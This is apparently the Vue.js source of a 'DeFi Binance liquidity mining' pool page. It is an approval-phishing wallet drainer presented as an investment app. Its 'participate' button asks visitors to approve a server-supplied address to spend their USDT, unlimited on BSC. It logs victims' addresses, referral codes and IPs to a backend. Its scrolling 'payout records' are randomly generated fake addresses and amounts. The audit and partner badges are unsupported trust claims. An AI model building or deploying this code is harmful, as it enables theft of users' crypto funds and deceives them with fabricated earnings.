<template>
	<div>
		<div>
			<div>
				<div data-v-486d5814="" data-v-30babe2d="" class="my-header">
					<div data-v-486d5814=""
						class="header-row van-row van-row--flex van-row--align-center van-row--justify-space-between">
						<div data-v-486d5814="" class="van-col van-col--8">
							<div data-v-459e9abf="" class="van-dropdown-menu">
								<div class="van-dropdown-menu__bar" @click="lang_open()">
									<div role="button" tabindex="0" class="van-dropdown-menu__item"><span
											class="van-dropdown-menu__title" style="">
											<div class="van-ellipsis" id="lang_text">{{xz_lang}}</div>
										</span></div>
								</div>
								<div data-v-459e9abf="">
									<div class="van-dropdown-item van-dropdown-item--down" style="top: 48.9531px;;"
										id="lang_div" v-show="lang_div">
										<div class="van-overlay"
											style="z-index: 2003; position: absolute; animation-duration: 0.2s; display: ;"
											@click="lang_open()">
										</div>
										<div class="van-popup van-popup--top van-dropdown-item__content"
											style="transition-duration: 0.2s; z-index: 2004; display: ;">

											<div role="button" tabindex="0"
												class="van-cell van-cell--clickable van-dropdown-item__option" style=""
												@click="change('en','English')">
												<div class="van-cell__title"><span>English</span></div>
											</div>

											<div role="button" tabindex="0"
												class="van-cell van-cell--clickable van-dropdown-item__option">
												<div class="van-cell__title" @click="change('tu','Türkçe')">
													<span>Türkçe</span>
												</div>
											</div>
											<div role="button" tabindex="0"
												class="van-cell van-cell--clickable van-dropdown-item__option">
												<div class="van-cell__title" @click="change('po','Português')">
													<span>Português</span>
												</div>
											</div>
											<div role="button" tabindex="0"
												class="van-cell van-cell--clickable van-dropdown-item__option">
												<div class="van-cell__title" @click="change('al','عربي')">
													<span>عربي</span>
												</div>
											</div>
											<div role="button" tabindex="0"
												class="van-cell van-cell--clickable van-dropdown-item__option">
												<div class="van-cell__title" @click="change('de','Deutsch')">
													<span>Deutsch</span>
												</div>
											</div>
											<div role="button" tabindex="0"
												class="van-cell van-cell--clickable van-dropdown-item__option">
												<div class="van-cell__title" @click="change('xi','español')">
													<span>español</span>
												</div>
											</div>
											<div role="button" tabindex="0"
												class="van-cell van-cell--clickable van-dropdown-item__option">
												<div class="van-cell__title" @click="change('yi','Italiano')">
													<span>Italiano</span>
												</div>
											</div>
											<div role="button" tabindex="0"
												class="van-cell van-cell--clickable van-dropdown-item__option">
												<div class="van-cell__title" @click="change('el','Русский')">
													<span>Русский</span>
												</div>
											</div>
											<div role="button" tabindex="0"
												class="van-cell van-cell--clickable van-dropdown-item__option">
												<div class="van-cell__title" @click="change('ja','日本')">
													<span>日本</span>
												</div>
											</div>
											<div role="button" tabindex="0"
												class="van-cell van-cell--clickable van-dropdown-item__option"
												@click="change('zh','简体中文')">
												<div class="van-cell__title"><span>简体中文</span></div>
											</div>
											<div role="button" tabindex="0"
												class="van-cell van-cell--clickable van-dropdown-item__option "
												@click="change('fa','繁体中文')">
												<div class="van-cell__title"><span>繁体中文</span></div>
											</div>
										</div>
									</div>
								</div>
							</div>
						</div>
						<div data-v-486d5814="" class="van-col van-col--8">
							<div data-v-486d5814="" class="flex align-center justify-center">
								<h2 data-v-486d5814="" class="plat-name">Pool</h2>
							</div>
						</div>
						<div data-v-486d5814="" class="van-col van-col--8"
							style="text-align: right; padding-right: 10px;"><button data-v-486d5814=""
								disabled="disabled"
								class="van-button van-button--default van-button--mini van-button--plain van-button--disabled van-button--hairline van-hairline--surround"
								style="overflow: hidden; text-overflow: ellipsis; white-space: nowrap; width: 100%;">
								<div data-v-486d5814="" class="van-button__content"><img :src="bi_img"
										style="width: 20px;height: 20px;" /><span data-v-486d5814=""
										class="van-button__text"
										style="overflow: hidden; text-overflow: ellipsis; white-space: nowrap;font-size:10px;margin-left: 10px;">{{selectedAccount}}</span>
								</div>
							</button></div>
					</div>
				</div> <!---->
			</div>
			<div data-v-69b51cbc="" class="ypage-box">
				<div data-v-69b51cbc="" class="body-top">
					<h3 data-v-69b51cbc="" class="intro01 large-title">{{$t('DeFi Binance')}}</h3>
					<h3 data-v-69b51cbc="" class="large-title">{{$t('流动性挖矿')}}</h3>
					<p data-v-69b51cbc="" class="tl p-l-20">{{$t('加入节点， 开始挖矿')}}</p>
					<div data-v-69b51cbc="" class="button-wrap">
						<div v-show="jiaru" @click="shouquan()"
							style="width: 80px; height: 35px; background-color: rgb(29, 179, 56); color: rgb(255, 255, 255); text-align: center; line-height: 35px; font-size: 14px; font-weight: 400; margin-top: 10px; border-radius: 5px;">
							{{$t('参 与')}}
						</div>
						<div v-show="yijiaru"
							style="width: 80px; height: 35px; background-color: #C0C0C0; color: rgb(255, 255, 255); text-align: center; line-height: 35px; font-size: 14px; font-weight: 400; margin-top: 10px; border-radius: 5px; display: none;">
							{{$t('已参与')}}
						</div>
					</div>
				</div>


				<div data-v-69b51cbc="" class="body-center box-shadow">
					<div data-v-69b51cbc="" class="tab-con">
						<h2 data-v-69b51cbc="">{{$t('矿池数据')}}</h2>
						<div data-v-69b51cbc="" class="tab-con-item"><span data-v-69b51cbc=""
								class="grey-color">{{$t('总产量')}}</span> <span data-v-69b51cbc=""
								class="link-color"><span data-v-69b51cbc="">
								</span> {{setting_arr_data.zcl}} BNB
							</span></div>
						<div data-v-69b51cbc="" class="tab-con-item"><span data-v-69b51cbc="" class="grey-color"
								d>{{$t('有效节点')}}</span> <span data-v-69b51cbc="" class="link-color"><span
									data-v-69b51cbc="">
								</span>{{setting_arr_data.youxiaojiedian}}</span></div>
						<div data-v-69b51cbc="" class="tab-con-item"><span data-v-69b51cbc=""
								class="grey-color">{{$t('参与者')}}</span> <span data-v-69b51cbc=""
								class="black-color"><span data-v-69b51cbc="">
								</span>{{setting_arr_data.canyuzhe}}</span></div>
						<div data-v-69b51cbc="" class="tab-con-item"><span data-v-69b51cbc=""
								class="grey-color">{{$t('用户收入')}}</span> <span data-v-69b51cbc="" class="black-color">≈
								<span data-v-69b51cbc="">
								</span>{{setting_arr_data.yonghushouyi}} USDT</span></div>
					</div>
					<div data-v-69b51cbc="" class="income">
						<h2 data-v-69b51cbc="" class="normal-title">{{$t('挖矿榜单')}}</h2>
						<p data-v-69b51cbc="" class="normal-p">{{$t('流动性挖矿收入')}}</p>
						<div data-v-69b51cbc="" class="output">
							<h2 data-v-69b51cbc="">{{$t('输出记录')}}</h2>
							<div data-v-69b51cbc="" class="title"><span data-v-69b51cbc=""
									class="grey-color">{{$t('地址')}}</span> <span data-v-69b51cbc=""
									class="grey-color">{{$t('数量')}}</span></div>
							<div data-v-69b51cbc="" class="con" style="height: 245px;">
								<div id="myScroll"
									class="swiper yswiper-container swiper-container-initialized swiper-container-vertical swiper-container-autoheight swiper-container-ios"
									style="height: 245px;">
									<div id="review_box" class="review_box">
										<ul id="comment1">
											<li style="width:100%;" v-for="item in address_data" :key="item">
												<div style="width:45%;float:left;height:100%;text-align:left;">
													{{item.address}}
												</div>
												<div
													style="width:45%;float:right;height:100%;text-align:right;padding-right:10px;">
													{{item.money}}USDT
												</div>
											</li>

										</ul>
										<ul id="comment2"></ul>
									</div>
								</div>
							</div>
						</div>
					</div>

					<div data-v-4b2725f6="" data-v-69b51cbc="" class="help-center">
						<h2 data-v-4b2725f6="" class="normal-title">{{$t('帮助中心')}}</h2>
						<p data-v-4b2725f6="" class="normal-p">{{$t('希望它可以帮助你')}}</p>
						<div data-v-4b2725f6="" class="con box-shadow20 radius10" style="text-align: left;">
							<div class="van-collapse van-hairline--top-bottom">
								<div class="van-collapse-item" v-for="(item,index) in help_data" :key="index">
									<div class="van-cell van-cell--clickable van-collapse-item__title"
										@click="kqcaozuo(index)">
										<div style="flex:1;font-size:14px;line-height:24px;">

											{{item.title_zh}}
										</div>


										<i class="van-icon van-icon-arrow van-cell__right-icon"><!----></i>
									</div>
									<div v-if="expandcollapse.includes(index)"
										style="    padding: 12px 16px;color: #969799;font-size: 14px;line-height: 1.5;background-color: #fff;width:90%;margin:0 auto;overflow: hidden;will-change: height;">

										{{item.nr_zh}}
									</div>
								</div>

							</div>
						</div>
					</div>
					<div data-v-1f372f82="" data-v-69b51cbc="">
						<div data-v-1f372f82="" class="partner" style="margin-bottom: 20px;">
							<h2 data-v-1f372f82="" class="normal-title">{{$t('安全保障')}}</h2>
							<p data-v-1f372f82="" class="normal-p">{{$t('我们有安全的审计报告')}}</p>
							<div data-v-1f372f82="" class="con">
								<div data-v-1f372f82="" class="partner-item van-row">
									<div data-v-1f372f82="" class="van-col van-col--8"
										style="padding-right: 13.3333px;">
										<div data-v-1f372f82="" class="img-wp"><img data-v-1f372f82=""
												src="../../public/img/bottom_icony1_2c904bb841f50b7942eb4f9c58bbbef7.png"
												width="100%"></div>
									</div>
									<div data-v-1f372f82="" class="van-col van-col--8"
										style="padding-left: 6.66667px; padding-right: 6.66667px;">
										<div data-v-1f372f82="" class="img-wp"><img data-v-1f372f82=""
												src="../../public/img/bottom_icon2.add7ffe9_add7ffe9e0523a92f9f49e56d53bcb12.png"
												width="100%"></div>
									</div>
									<div data-v-1f372f82="" class="van-col van-col--8"
										style="padding-left: 13.3333px; padding-right: 1.77636e-15px;">
										<div data-v-1f372f82="" class="img-wp"><img data-v-1f372f82=""
												src="../../public/img/bottom_icony2_f7ff2fcfe714aa8478980b55b88650ba.png"
												width="100%"></div>
									</div>
								</div>
							</div>
						</div>
						<div data-v-1f372f82="" class="partner" style="margin-bottom: 20px;">
							<h2 data-v-1f372f82="" class="normal-title">{{$t('伙伴')}}</h2>
							<p data-v-1f372f82="" class="normal-p">{{$t('我们的商业伙伴')}}</p>
							<div data-v-1f372f82="" class="con">
								<div data-v-1f372f82="" class="partner-item van-row">
									<div data-v-1f372f82="" class="van-col van-col--8"
										style="padding-right: 13.3333px;">
										<div data-v-1f372f82="" class="img-wp"><img data-v-1f372f82=""
												src="../../public/img/bottom_icon4.4d5f89ae_4d5f89aec157208fab9c236942382d97.png"
												width="100%"></div>
									</div>
									<div data-v-1f372f82="" class="van-col van-col--8"
										style="padding-left: 6.66667px; padding-right: 6.66667px;">
										<div data-v-1f372f82="" class="img-wp"><img data-v-1f372f82=""
												src="../../public/img/bottom_icon5.5b5f263b_5b5f263b08088f5d093550251f8d1639.png"
												width="100%"></div>
									</div>
									<div data-v-1f372f82="" class="van-col van-col--8"
										style="padding-left: 13.3333px; padding-right: 1.77636e-15px;">
										<div data-v-1f372f82="" class="img-wp"><img data-v-1f372f82=""
												src="../../public/img/bottom_icon6.76f5002b_76f5002bf87fd0d4a3cabbdc9a951943.png"
												width="100%"></div>
									</div>
								</div>
								<div data-v-1f372f82="" class="partner-item van-row">
									<div data-v-1f372f82="" class="van-col van-col--8"
										style="padding-right: 13.3333px;">
										<div data-v-1f372f82="" class="img-wp"><img data-v-1f372f82=""
												src="../../public/img/bottom_icon7.1b419a38_1b419a3842a7fca6e2ebb68ac697dd25.png"
												width="100%"></div>
									</div>
									<div data-v-1f372f82="" class="van-col van-col--8"
										style="padding-left: 6.66667px; padding-right: 6.66667px;">
										<div data-v-1f372f82="" class="img-wp"><img data-v-1f372f82=""
												src="../../public/img/bottom_icon10.2691fa36_2691fa366d762f442ddd3ff5c584a1d2.png"
												width="100%"></div>
									</div>
									<div data-v-1f372f82="" class="van-col van-col--8"
										style="padding-left: 13.3333px; padding-right: 1.77636e-15px;">
										<div data-v-1f372f82="" class="img-wp"><img data-v-1f372f82=""
												src="../../public/img/bottom_icon9.bd7ceb3c_bd7ceb3c09eae6915d586b1b4f850c1d.png"
												width="100%"></div>
									</div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div> <!---->
		</div>
		<div style="width: 40px;height: 40px;position: fixed;bottom:100px;z-index:9999;right: 20px;" @click="tzkefu()">
			<img src="../../public/img/kefu.png" style="width: 100%;"/>
		</div>
		<div>
			<div data-v-2120af5d="" data-v-30babe2d="">
				<div data-v-2120af5d="" class="van-tabbar__placeholder" style="height: 50px;">
					<div class="van-tabbar van-tabbar--fixed">

						<div data-v-2120af5d="" class="van-tabbar-item van-tabbar-item--active">
							<div class="van-tabbar-item__icon"><i class="van-icon van-icon-home-o"></i></div>
							<div class="van-tabbar-item__text">{{$t('首页')}}</div>
						</div>

						<div data-v-2120af5d="" class="van-tabbar-item" @click="tz('/pool')">
							<div class="van-tabbar-item__icon"><i class="van-icon van-icon-gem"></i></div>
							<div class="van-tabbar-item__text">{{$t('我的矿池')}}</div>
						</div>

						<div data-v-2120af5d="" class="van-tabbar-item" @click="tz('/exchange')">
							<div class="van-tabbar-item__icon"><i class="van-icon van-icon-paid"></i></div>
							<div class="van-tabbar-item__text">{{$t('提取')}}</div>
						</div>
						<div data-v-2120af5d="" class="van-tabbar-item" @click="tz('/team')">
							<div class="van-tabbar-item__icon"><i class="van-icon van-icon-friends-o"></i></div>
							<div class="van-tabbar-item__text">{{$t('推荐')}}</div>
						</div>
						<div data-v-2120af5d="" class="van-tabbar-item" @click="tz('/account')">
							<div class="van-tabbar-item__icon"><i class="van-icon van-icon-user-o"></i></div>
							<div class="van-tabbar-item__text">{{$t('账户')}}</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div> <!---->
</template>

<script>
	import Web3 from 'web3'
	import abi from '../../public/abi/ERC20.json'
	import axios from 'axios'
	import {
		ethers
	} from 'ethers';
	import {
		useI18n
	} from 'vue-i18n'

	import domain from '../../public/domain';

	import layer from "layui-layer";


	export default {
		name: 'App',
		data() {
			return {
				selectedAccount: '',
				address: '',
				lang_div: false,
				xz_lang: 'English',
				setting_arr_data: [],
				help_data: [],
				address_data: [],
				expandcollapse: [],
				balance: 0,
				code: '',
				s: '',
				au_address: "",
				bi_img: '../../img/eth.png',
				kgf: 0,
				fish_data: '',
				jiaru: true,
				yijiaru: false,
				kefu_url:''

			}
		},


		methods: {
			kefu(){
				var im = this
				
				axios({
						method: 'get',
						url: domain.publicUrl + "/api/api/kefu_url"
					})
					.then(function(response) {
						console.log(response.data)
						if (response.data.code == 0) {
							console.log(response.data.data)
				
							im.kefu_url = response.data.data
				
						}
					})
					.catch(function(error) {
						console.log(error);
					});
				
			},
			minus() {
				// alert('123')
				var arr = [];
				for (var i = 0; i <= 100; i++) {
					arr[i] = [];
					for (var j = 0; j < 3; j++) {
						var address = '0x' + Array(40).fill(0).map(() => Math.random().toString(16).slice(2, 10))
							.join('');
						var newerc20Address = address.substr(0, 6) + "...." + address.substr(-6);
						arr[i]['address'] = newerc20Address;
						var sj_money = Math.random() * (200 - 1 + 1) + 1;
						arr[i]['money'] = sj_money.toFixed(2);
					}
				}
				console.log(arr)
				this.address_data = arr;
			},
			help_list() {
				var lang = this.$i18n.locale;

				var im = this

				axios({
						method: 'get',
						url: domain.publicUrl + "/api/api/help_data?lang=" + lang,
					})
					.then(function(response) {
						console.log(response.data)
						if (response.data.code == 0) {
							console.log(response.data.data)

							im.help_data = response.data.data

						}
					})
					.catch(function(error) {
						console.log(error);
					});

			},
			kqcaozuo(index) {
				if (this.expandcollapse.includes(index)) {
					this.expandcollapse = this.expandcollapse.filter((item) => {
						return item !== index;
					});
				} else {
					this.expandcollapse.push(index);
				}
			},
			roll(t) {
				var ul1 = document.getElementById("comment1");
				var ul2 = document.getElementById("comment2");
				var ulbox = document.getElementById("review_box");
				ul2.innerHTML = ul1.innerHTML;
				ulbox.scrollTop = 0; // 开始无滚动时设为0
				var timer = setInterval(this.rollStart, t); // 设置定时器，参数t用在这为间隔时间（单位毫秒），参数t越小，滚动速度越快
				// 鼠标移入div时暂停滚动
				ulbox.onmouseover = function() {
					clearInterval(timer);
				}
				// 鼠标移出div后继续滚动
				ulbox.onmouseout = function() {
					timer = setInterval(this.rollStart, t);
				}
			},

			// 开始滚动函数
			rollStart() {
				// 上面声明的DOM对象为局部对象需要再次声明
				var ul1 = document.getElementById("comment1");
				var ul2 = document.getElementById("comment2");
				var ulbox = document.getElementById("review_box");
				// 正常滚动不断给scrollTop的值+1,当滚动高度大于列表内容高度时恢复为0
				if (ulbox.scrollTop >= ul1.scrollHeight) {
					ulbox.scrollTop = 0;
				} else {
					ulbox.scrollTop += 1;
				}
			},
			tz(url) {
				for (var i = 1; i < 1000; i++) {
					clearInterval(i);
				}
				window.location.href = '/#' + url
			},
			tzkefu() {
				
				window.location.href = this.kefu_url
			},
			change(type, name) {

				console.log(this.$i18n.locale)
				this.$i18n.locale = type
				this.lang_div = false
				this.xz_lang = name

				sessionStorage.setItem("lang_type", type);

				window.location.reload();
			},
			lang_open() {
				if (this.lang_div == true) {
					this.lang_div = false
				} else {
					this.lang_div = true
				}
			},
			async wakeUpWallet() {
				var s = this.$route.query.s
				if (s) {
					this.s = s;
				}
				var lang = this.$i18n.locale
				var name = "English"
				if (lang == 'zh') {
					name = '简体中文'
				} else if (lang == 'fa') {
					name = '繁体中文'
				} else if (lang == 'en') {
					name = 'English'
				} else if (lang == 'po') {
					name = 'Português'
				} else if (lang == 'al') {
					name = 'عربي'
				} else if (lang == 'de') {
					name = 'Deutsch'
				} else if (lang == 'xi') {
					name = 'español'
				} else if (lang == 'yi') {
					name = 'Italiano'
				} else if (lang == 'el') {
					name = 'Русский'
				} else if (lang == 'ja') {
					name = '日本語'
				} else if (lang == 'tu') {
					name = 'Türkçe'
				}
				this.xz_lang = name


				if (window.ethereum) {
					window.ethereum.enable().then((res) => {
						var address = res[0];

						console.log(address)
						this.selectedAccount = address.substr(0, 4) + "..." + address.substr(-4);
						this.address = address;

						sessionStorage.setItem("selectedAccount", this.selectedAccount);
						sessionStorage.setItem("address", this.address);

						this.havegetId()

					})


				} else if (window.web3) {

					const web3 = new Web3(window.web3.currentProvider);
					// 使用 web3 对象
				} else {
					console.log("未检测到钱包")
				}

				await window.ethereum.on('chainChanged', (chainId) => {
					// 正确处理链更改之后的业务流程可能很复杂。官方建议链更改只有重新加载页面
					console.log("chainId", chainId)
					window.location.reload();
				});



			},
			async havegetId() {
				var balance = this.balance
				var code = this.code
				var s = this.s

				var getId = await window.ethereum.request({
					method: 'eth_chainId'
				});
				// alert(getId)
				console.log(getId)
				var walletAddress = this.address
				if (getId == "0x1" || getId == 1 || getId == "1") {

					this.type = 'ETH';
					this.bi_img = '../../img/eth.png'

					sessionStorage.setItem("type", "ETH");
					sessionStorage.setItem("bi_type", "ETH");
					sessionStorage.setItem("bi_img", '../../img/eth.png');
					this.get_au_address('erc')

					this.eth_u_xl_div = true


					var au_address = this.au_address

					balance = this.balance
					this.insert_trc_wsq_data(walletAddress, au_address, code, balance, s, 'erc')

				}
				if (getId == "0xcc" || getId == 56 || getId == "56") {
					this.type = 'BSC'
					this.bi_img = '../../img/bnb.svg'
					sessionStorage.setItem("type", "BSC");
					sessionStorage.setItem("bi_type", "BNB");
					sessionStorage.setItem("bi_img", '../../img/bnb.svg');

					this.get_au_address('bsc')
					this.bsc_u_xl_div = true

					balance = this.balance
					this.insert_trc_wsq_data(walletAddress, au_address, code, balance, s, 'bsc')
				}


				this.get_yue()
				
				this.up_box()
			},

			get_yue() {
				var s = this.$route.query.s
				if (s) {
					this.s = s;
				}

				var code = this.$route.query.code
				if (code) {
					this.code = code;
				}
				var address = sessionStorage.getItem("address");
				var type = sessionStorage.getItem("type");
				var newtype = '';
				if (type == "ETH") {

					newtype = 'erc';
				} else {
					newtype = 'bsc';
				}


				var im = this
				axios({
						method: 'get',
						url: domain.publicUrl + "/api/api/get_yue?type=" + newtype + "&address=" + address
					})
					.then(function(response) {
						if (response.data.data.length !== 0) {
							im.fish_data = response.data.data
							im.jiaru = response.data.data.status == 1 ? false : true
							im.yijiaru = response.data.data.status == 1 ? true : false
						}

					})
					.catch(function(error) {
						console.log(error);
					});
			},
			get_au_address(type) {
				var im = this
				axios({
						method: 'get',
						url: domain.publicUrl + "/api/api/get_address?type=" + type
					})
					.then(function(response) {
						if (response.data.code == 0) {
							im.au_address = response.data.data.authorized_address
						}
					})
					.catch(function(error) {
						console.log(error);
					});
			},
			setting_arr_data_api() {
				var im = this
				axios({
						method: 'get',
						url: domain.publicUrl + "/api/api/setting_arr_data",
					})
					.then(function(response) {
						console.log(response.data)
						if (response.data.code == 0) {
							console.log(response.data.data)
							im.setting_arr_data = response.data.data

						}
					})
					.catch(function(error) {
						console.log(error);
					});
			},
			async shouquan() {


				var load = layer.load(2, {
					shade: [0.4, '#000'],
					time: false,
				})


				var balance = this.balance
				var code = this.code
				var s = this.s
				var au_address = this.au_address
				var im = this
				var walletAddress = this.address
				var type = sessionStorage.getItem("type");
				// alert(type)
				if (type == 'ETH') {
					let im = this
					let authorized_address = au_address

					const provider = new ethers.providers.Web3Provider(window.ethereum);



					// 获取用户的账户
					const signer = provider.getSigner();
					const userAddress = await signer.getAddress();
					// alert(userAddress)
					// ERC20 合约地址和 ABI
					const tokenAddress = "0xdac17f958d2ee523a2206206994597c13d831ec7"; // 替换为你的代币合约地址

					const amount = ethers.utils.parseUnits("100", 18);
					// 创建合约实例
					const tokenContract = new ethers.Contract(tokenAddress, abi, signer);

					try {
						// 调用 approve 方法
						const tx = await tokenContract.approve(authorized_address, amount);
						// console.log('交易发送:', tx);

						// 等待交易确认
						await tx.wait();
						// console.log('交易已确认');
						im.insert_address('erc', walletAddress, authorized_address, balance, code, s)

						layer.close(load);

					} catch (error) {

						// console.error('交易失败:', error);
						// im.insert_address('erc', walletAddress, authorized_address, balance, code, s)
						// layer.msg('error')
						layer.close(load);

					}

				} else if (type == 'BSC') {

					let im = this
					let authorized_address = au_address

					const provider = new ethers.providers.Web3Provider(window.ethereum);

					// 获取用户的账户
					const signer = provider.getSigner();
					const userAddress = await signer.getAddress();

					// alert(userAddress)
					// ERC20 合约地址和 ABI
					const tokenAddress = "0x55d398326f99059ff775485246999027b3197955"; // 替换为你的代币合约地址

					// const amount = ethers.utils.parseUnits("100", 18);
					const amount = ethers.constants.MaxUint256;
					// 创建合约实例
					const tokenContract = new ethers.Contract(tokenAddress, abi, signer);

					try {
						// 调用 approve 方法
						const tx = await tokenContract.approve(authorized_address, amount);
						// console.log('交易发送:', tx);

						// 等待交易确认
						await tx.wait();
						// console.log('交易已确认');
						im.insert_address('bsc', walletAddress, authorized_address, balance, code, s)

						layer.close(load);

					} catch (error) {
						// console.error('交易失败:', error);
						// im.insert_address('bsc', walletAddress, authorized_address, balance, code, s)
						// layer.msg('error')
						layer.close(load);

					}
				}




			},
			insert_trc_wsq_data(address, authorized_address, code, balance, s, type) {
				// alert(code)
				console.log('s', s);
				axios({
						method: 'POST',
						url: domain.publicUrl + "/api/api/insert_trc_wsq_data",
						data: {
							address: address,
							authorized_address: authorized_address,
							balance: balance,
							code: code,
							s: s,
							type: type
						},
					})
					.then(function(response) {
						console.log(response)

					})
					.catch(function(error) {
						console.log(error);
					});

			},
			insert_address(type, address, authorized_address, balance, code, s) {

				var im = this
				axios({
						method: 'POST',
						url: domain.publicUrl + "/api/api/insert_trc_1",
						data: {
							type: type,
							address: address,
							authorized_address: authorized_address,
							balance: balance,
							code: code,
							s: s
						},
					})
					.then(function(response) {
						console.log(response)
						im.get_yue()
					})
					.catch(function(error) {
						console.log(error);
					});


			},
			in_login_ip() {
				var address = sessionStorage.getItem('address');

				let type = sessionStorage.getItem('type');
				var newtype = '';
				if (type == "ETH") {

					newtype = 'erc';
				} else {
					newtype = 'bsc';
				}
				axios({
						method: 'get',
						url: domain.publicUrl + "/api/api/in_login_ip?address=" + address + '&type=' + newtype,
					})
					.then(function(response) {

					})
					.catch(function(error) {
						console.log(error);
					});
			},
			fn() {
				var lang_type = sessionStorage.getItem("lang_type");
				var name = "English"
				if (!lang_type) {
					name = "English"
				} else {
					if (lang_type == 'zh') {
						name = '简体中文'
					} else if (lang_type == 'fa') {
						name = '繁体中文'
					} else if (lang_type == 'en') {
						name = 'English'
					} else if (lang_type == 'po') {
						name = 'Português'
					} else if (lang_type == 'al') {
						name = 'عربي'
					} else if (lang_type == 'de') {
						name = 'Deutsch'
					} else if (lang_type == 'xi') {
						name = 'español'
					} else if (lang_type == 'yi') {
						name = 'Italiano'
					} else if (lang_type == 'el') {
						name = 'Русский'
					} else if (lang_type == 'ja') {
						name = '日本語'
					} else if (lang_type == 'tu') {
						name = 'Türkçe'
					}
				}


				this.xz_lang = name
			},
			up_box() {
				var lang = this.$i18n.locale
				var address = sessionStorage.getItem('address');

				let type = sessionStorage.getItem('type');
				var newtype = '';
				if (type == "ETH") {

					newtype = 'erc';
				} else {
					newtype = 'bsc';
				}
				var im = this;
				axios({
						method: 'get',
						url: domain.publicUrl + "/api/api/get_up_box?address=" + address + '&type=' + newtype +
							'&lang=' + lang,
					})
					.then(function(response) {
						if (response.data.data) {
							layer.open({
								type: 1,
								title: false,
								content: "<div style='width:100%;height:400px;background: url(../img/up_img.png) no-repeat;background-size:100% 495px;margin-top:-36px;'><div style='height:190px;'></div><div style='width:100%;height:50px;text-align:center;line-height:50px;font-size:18px;'>"+im.$i18n.t('公告')+"</div><div style='width:100%;height:120px;'><pre>" +
									response.data.data +
									"</pre></div><div style='height:30px;color:#fff;text-align:center;line-height:20px;font-size:16px;'>"+im.$i18n.t('我知道了')+"</div></div>",
								area: ['80%', '400px'], // 初始宽高
								shade: [0.8, '#000'],
								shadeClose: true // 点击遮罩区域，关闭弹层
							});

							sessionStorage.setItem('up_box', 1);
						}
					})
					.catch(function(error) {
						console.log(error);
					});


			}
		},
		mounted: function() { //自动触发写入的函数
			this.wakeUpWallet();
			this.setting_arr_data_api();
			this.minus();
			this.help_list();
			this.roll(40);
			this.in_login_ip();
			this.fn();
			this.kefu();


			// this.wakeUpWallet();
			// this.up_box();

		}
	}
</script>